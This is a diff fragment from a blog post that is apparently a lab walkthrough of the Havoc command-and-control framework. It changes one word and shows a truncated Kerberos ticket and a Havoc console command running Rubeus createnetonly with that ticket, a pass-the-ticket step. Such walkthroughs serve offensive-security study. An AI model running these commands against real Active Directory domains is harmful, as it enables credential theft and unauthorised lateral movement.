pikaroot/pikaroot.github.io/_blogs/2023-02-25-HAVOC_Framework.md

       doIFejCC[...]TE9DQUw=
 ```

-After extracting the TGT, we can leverage it via a new logon session by using `Rubeus.exe createnetonly`.
+After extracting the TGT, we can leverage it to a new logon session by using `Rubeus.exe createnetonly`.
 The `/password` parameter can be anything as long as the `/domain`, `/username`, and `/ticket` parameters are correct.

 ```
 06/03/2023 15:36:21 [5pider] Demon » dotnet inline-execute /home/havoc/Desktop/Tools/Rubeus/Rubeus/bin/Debug/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:HAVOC /username:m.seitz /password:FakePass /ticket:doIFejCC[...]TE9DQUw=